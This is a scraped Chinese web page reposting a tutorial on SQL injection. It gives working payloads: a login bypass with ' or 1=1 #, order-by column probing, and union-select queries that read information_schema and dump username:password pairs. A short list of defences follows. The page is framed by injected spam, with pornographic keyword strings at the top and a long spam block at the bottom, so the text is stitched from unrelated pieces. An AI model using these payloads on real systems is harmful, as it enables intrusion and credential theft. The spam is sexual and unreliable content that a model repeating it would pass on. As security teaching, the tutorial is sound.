好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > SQL注入的實(shí)現(xiàn)以及防范示例詳解

SQL注入的實(shí)現(xiàn)以及防范示例詳解

熱門標(biāo)簽:江西南昌百應(yīng)電話機(jī)器人 400電話從哪里申請濱州 杭州400電話如何申請的 高德地圖標(biāo)注商家在哪 機(jī)器人電話機(jī)創(chuàng)意繪畫 天音通信電話機(jī)器人 hbuilder地圖標(biāo)注 400電話申請?jiān)趺纯?/a> 隨州營銷電話機(jī)器人怎么樣

什么是SQL注入

SQL注入是指通過構(gòu)建特殊的輸入篡改原來的SQL語句達(dá)到攻擊者所需的操作。

Sql 注入產(chǎn)生原因

我們訪問動態(tài)網(wǎng)頁時往往會向服務(wù)器發(fā)送請求,服務(wù)器向數(shù)據(jù)訪問層發(fā)起 Sql 查詢請求,若驗(yàn)證通過就會執(zhí)行 Sql 語句。如果用戶輸入的數(shù)據(jù)被構(gòu)造成惡意Sql代碼,如果程序沒有細(xì)致地過濾用戶輸入的數(shù)據(jù)則會使非法數(shù)據(jù)侵入系統(tǒng)。

登錄案例講解

select * from admin where uname='用戶名' and pwd='密碼'

輸入 'or 1=1 #(–空格或–+或#:注釋掉后面的sql語句)

這時SQL語句變?yōu)椋?code>select * from admin where uname='' or 1=1 # and pwd='密碼',這時SQL語句永遠(yuǎn)成立,繞過登錄。

基于GET方式的SQL注入

通過在URL中修改對應(yīng)的ID值,為正常數(shù)字、大數(shù)字、字符(單引號、雙引號、雙單引號、括號)、反斜杠來探測URL中是否有注入點(diǎn)。

可登陸到mituan.zone進(jìn)行測試

1、' '1'' LIMIT 0,1 ' :多了一個單引號

可猜測SQL語句為:select login_name,password from admin where id = 'id' limit 0,1

2、' ' LIMIT 0,1 ':多了一個單引號

可猜測SQL語句為:select login_name,password from admin where id = id limit 0,1

3、' '1'') LIMIT 0,1 ':多了一個單引號

可猜測SQL語句為:select login_name,password from admin where id = ('id') limit 0,1

4、單引號、括號都不報(bào)錯說明被接收的是字符串類型' "1"") LIMIT 0,1 ':多了一個雙引號

可猜測SQL語句為:select login_name,password from admin where id = ("id") limit 0,1

SQL注入利用

1、利用order by判斷字段數(shù)

order by n(n為猜測字段數(shù))--+

以案例一為例

select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜測錯誤時則會報(bào)錯

此時探測到有3個字段,用?id=0' union select 1,2,3--+探測到Login_name在第二列,Password在第三列,則第二、三列可利用。

?id=0' union select 1,2,3--+2,3改為user():查看當(dāng)前MYSQL登錄用戶名,database():查看當(dāng)前使用MYSQL數(shù)據(jù)庫名,version():查看當(dāng)前MYSQL版本,如改為?id=0'union select 1,user(),database()--+ 得到下圖中信息

2、利用union select 聯(lián)合查詢,獲取表名。(在使用union select時要將前面的SQL語句報(bào)錯)

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

3、利用union select 聯(lián)合查詢,獲取字段名。(以上面查詢到的users表為例)

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

4、利用union select 聯(lián)合查詢,獲取字段值。(以上面查詢到的users表為例)

union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a為冒號,用來分隔不同字段的值)

如果是地址欄不能顯示信息的POST形式則可以在對話框中輸入注入語句






這里使用的方法和在地址欄中的輸入一樣,都是先報(bào)錯前面的SQL語句再使用union select聯(lián)合查詢拿出表中數(shù)據(jù)

SQL 注入的防范方法

  • 對用戶的輸入進(jìn)行過濾。如:對用戶的輸入進(jìn)行校驗(yàn),可以通過正則表達(dá)式、限制長度、對單引號和雙"-"進(jìn)行轉(zhuǎn)換等。
  • 編寫程序時不要使用動態(tài)拼裝sql,可以使用參數(shù)化的sql或者直接使用存儲過程進(jìn)行數(shù)據(jù)查詢存取。
  • 不要直接使用管理員權(quán)限的數(shù)據(jù)庫連接,每個應(yīng)用使用單獨(dú)的且權(quán)限有限的數(shù)據(jù)庫。
  • 不要把機(jī)密信息直接存放,加密或者h(yuǎn)ash掉密碼和敏感的信息。
  • 程序的異常信息應(yīng)該給出盡可能少的提示,最好使用自定義的錯誤信息對原始錯誤信息進(jìn)行包裝。

總結(jié)

到此這篇關(guān)于SQL注入的實(shí)現(xiàn)以及防范的文章就介紹到這了,更多相關(guān)SQL注入實(shí)現(xiàn)及防范內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Java SQL注入案例教程及html基礎(chǔ)入門
  • MyBatis下SQL注入攻擊的3種方式
  • Mybatis-Plus的應(yīng)用場景描述及注入SQL原理分析
  • 如何有效防止sql注入的方法
  • Java使用過濾器防止SQL注入XSS腳本注入的實(shí)現(xiàn)
  • 實(shí)例介紹SQL注入以及如何解決
  • 有效防止sql注入的方法演示
  • 數(shù)據(jù)庫之SQL注入原理以及過程的簡單介紹

標(biāo)簽:葫蘆島 石嘴山 沈陽 招商 昆明 保定 鶴崗 常德

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《SQL注入的實(shí)現(xiàn)以及防范示例詳解》,本文關(guān)鍵詞  SQL,注入,的,實(shí)現(xiàn),以及,防范,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《SQL注入的實(shí)現(xiàn)以及防范示例詳解》相關(guān)的同類信息!
  • 本頁收集關(guān)于SQL注入的實(shí)現(xiàn)以及防范示例詳解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    主站蜘蛛池模板: 国产又粗又猛又爽又黄的国漫视频 | 26uuu亚洲国产精品| 精品福利视频一区二区三区| 亚洲1卡2卡三卡3卡4卡网站| 又粗又大又爽**一级毛片| 丰满大屁股熟妇猛交XXOO漫画| 用力插好舒服| 国产精华液一线二线三线区别在哪| 国产农村户外妇性视频| 高潮抽搐失禁大喷水尖叫| 男女在电梯做爰视频| 樱空桃作品在线| 精品99一区二区三区麻豆| 女友被黑人夹了三明治的小说| 久久久久亚洲精品中文字幕| 这几天没c你了是不是皮痒了| 9I精品福利一区二区三区蜜桃| 好湿好舒服| 亚洲精品午夜视频| 男生草女生视频| 风流少妇妇A片麻豆| 越南电影《性的暴行》| 日韩性插| 国产handjob手交在线播放 | 榴莲黄瓜秋葵丝瓜蕾丝最入口| 乱理三级在线看| 肥胖女人一级毛片免费| 日本19xxxxxxxx69| 日韩强吻揉胸视频| 欧美精品一区二区三区AV麻豆 | 午夜h| 麻豆蜜桃69无码专区在线| yw.193.爆乳尤物.ccm| 欧美乱大交黑人| 天天噜噜揉揉狠狠夜夜| 饥渴老翁一夜要了我三次在线观看| 糟蹋女教师慧芬小媚小说| 老熟妇重口另类XXX| 欧美日韩亚洲成人| 公息肉浴秀婷| 午夜伦伦电影理论片费看|